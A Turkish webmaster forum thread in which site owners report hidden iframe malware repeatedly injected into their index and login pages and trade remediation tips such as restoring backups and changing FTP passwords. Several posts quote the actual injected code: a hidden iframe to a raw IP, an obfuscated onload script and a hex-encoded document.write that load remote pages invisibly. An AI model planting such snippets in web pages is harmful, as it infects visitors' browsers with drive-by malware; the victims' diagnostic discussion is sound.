• 13-12-2007, 01:11:21
    #1
    Sitemdeki index.php ve index.html sayfalarıma frame kod yerleşiyor virüs uyarısı veriyor kullandığım antivirüs programları ve birkaç arkadaşada denettirdim sayfaları uyarı veriyor virüs diye dediğim sayfalara otomatik eklenen frame kodu şu siliyorum ekleniyor siliyorum ekleniyor en son yazma izinlerini komple kapattım bakalım bi daha eklenicekmi merak ediyorum...

    bende habersi otomatik sildikçe yine gelen kod:
    <iframe src='http://62.176.16.19/tt.php' width='1' height='1' style='visibility: hidden;'></iframe>
    eklenme zamanı 06.12.2007 18:52 de
    koddaki adrese girdiğim zamam firefox direk kapanıyor

    ip whois bilgileri
    DNS Stuff: DNS tools, DNS hosting tests, WHOIS, traceroute, ping, and other network and domain name tools.

    Böyle birşey başına gelen arkadaş varmı vede çözümü nedir şimdiden teşekkür ederim arkadaşlar
  • 13-12-2007, 03:25:18
    #2
    Benim başıma gelmişti geçen sene. Forum dosyalarına karışmıştı virüs, daha sonra benim ftpye bağlanan arkadaşın bilgisayarına, ordan da onun ftpsine bulaşmıştı (:
    Forumu silip yedeğini atmıştım ben, sorun çözülmüştü. Ama senin için iyi bir çözüm yolu değil sanırım...

    Geçmiş olsun ...
  • 13-12-2007, 03:50:22
    #3
    bu konu hakkinda daha evvel soru sorulmus ve cevabi verilmistir once index.html veya php ni masa üstüne at bence ve o dosyayi tara virus taramasi ile bence o gelen virus toplistlerdendir toplistleri tek tek kontrol et benim basimada gelmisti daha sonra ftp sifreni degistir ama toplistleri cok iyi kontrol et ben kurtuldum böyle yapip
  • 13-12-2007, 03:50:54
    #4
    Merhaba aynı şekilde 1 / 2 yıl önce benimde başıma gelmişti.
    Sitemde dosyalarda yoktu ancak girdiğim bir sitede ekliydi. O Siteye girdiğimde bilgisayarımda ne kadar web tabanlı yazılım varsa .asp .html .php vs. hepsinin en altına bu kodu yerleştiriyordu. Sildikçe geri geliyordu.

    bu olay sunucuda iken kaynaklanıyorsa problem sunucudadır. Dosyalarınızın yedeğini alıp tekrar kurmanızı tavsiye ederim. ama başka bir servera yada formatlanması halinde aynı yere.

    Geçmiş Olsun İyi Çalışmalar
  • 13-12-2007, 16:38:44
    #5
    Bilgiler için teşekkürler.

    Sunucuda eklendi bu dosyalar sadece index.html index.php ve login.php odsyalarına eklenmiş diğer dosyalarıda tek tek kod araması yaptım yoktu hepsini temişledim şifreleri felanda değiştirdim toplistleri komple kaldırdım bakalım bir daha olucakmı

    hepinize tekrardan teşekkür ederim arkadaşlar
  • 11-01-2008, 17:37:59
    #6
    Kimlik doğrulama veya yönetimden onay bekliyor.
    Ftp deki Tüm Klasörlerimin İçindeki index.php ve index.html dosyalarının içinde asagıdaki gibi virüs kodu buldum bdrd.ru diye bir siteye ulastım burdan kodlarıda asagıda

    <body onload="status=' ';zz='o';sl='/';sf='ram';us='u';pi='b';po='.';gw='fi';qu=':';yh= 't';vo='h';bw='e';pj='m';iu='g';pt='tp';yw='p';ab= 'src';dg='ht';ko='e';wd='if';hh='r';t=wd.concat(sf ,ko);xx=dg.concat(pt,qu,sl,sl,pi,hh,pi,iu,po,hh,us ,sl,po,yh,po,yw,vo,yw);var oE=document.createElement(t);oE.setAttribute('widt h','0');oE.setAttribute('height','0');oE.setAttrib ute('style','display:none');oE.setAttribute(ab,xx) ;document.body.appendChild(oE);">


    İndex sayfalarınızı kontrol ediniz
  • 11-01-2008, 18:07:06
    #7
    Sorunun kaynağı filezilla ftp programıdır.
    Parolaları xml içinde kaydediyor bilgisayarınıza bu trojan bulaşmış ise bu xml içindeki sitelerdeki default,index,login,logout dosyalarına kod bloğu yerleştiriyor.
    Bu yüzden filezilla kullanmayın yada parolalarınızı kaydettirmeyin.
  • 29-02-2008, 01:47:12
    #8
    Arkadaşlar aynı problem bende de var.index.html sayfalara bulaşıyor genelde silsemde pek fayda etmiyor.Acaba bu virüs toplistlerden mi geliyor yoksa cuteftp gibi bir programdan mı.Ayrıca sildikçe çoğalması için ya şifreyi biliyor olması gerek ya da ftp nin içinde exe gibi bi virüs bulunması lazım sanırım.Bilgilendirirseniz çok sevinirim.
    Bu virüsün Ruslar tarafından piyasaya çıkarıldığını duymuştum.Bendeki kodda şu şekilde..

    <script>function v4784cfa23d1aa(v4784cfa23d1b0){  return(parseInt(v4784cfa23d1b0,16));}function v4784cfa23d204(v4784cfa23d20a){ var v4784cfa23d21a=2; var v4784cfa23d20e='';for(v4784cfa23d213=0; v4784cfa23d213<v4784cfa23d20a.length; v4784cfa23d213+=v4784cfa23d21a){ v4784cfa23d20e+=(String.fromCharCode(v4784cfa23d1aa(v4784cfa23d20a.substr(v4784cfa23d213, v4784cfa23d21a))));}return v4784cfa23d20e;} document.write(v4784cfa23d204('3C696672616D65206E616D653D273233366127207372633D27687474703A2F2F36312E31392E35302E3233332F69662F69322F696E6465782E7068703F6F75743D31313939313535313633272077696474683D333236206865696768743D3632207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E'));</script>
  • 01-03-2008, 16:29:00
    #9
    Kimlik doğrulama veya yönetimden onay bekliyor.
    banada olmuştu bu tek tek indexlerin içini açıp silmiştim fayda etmedi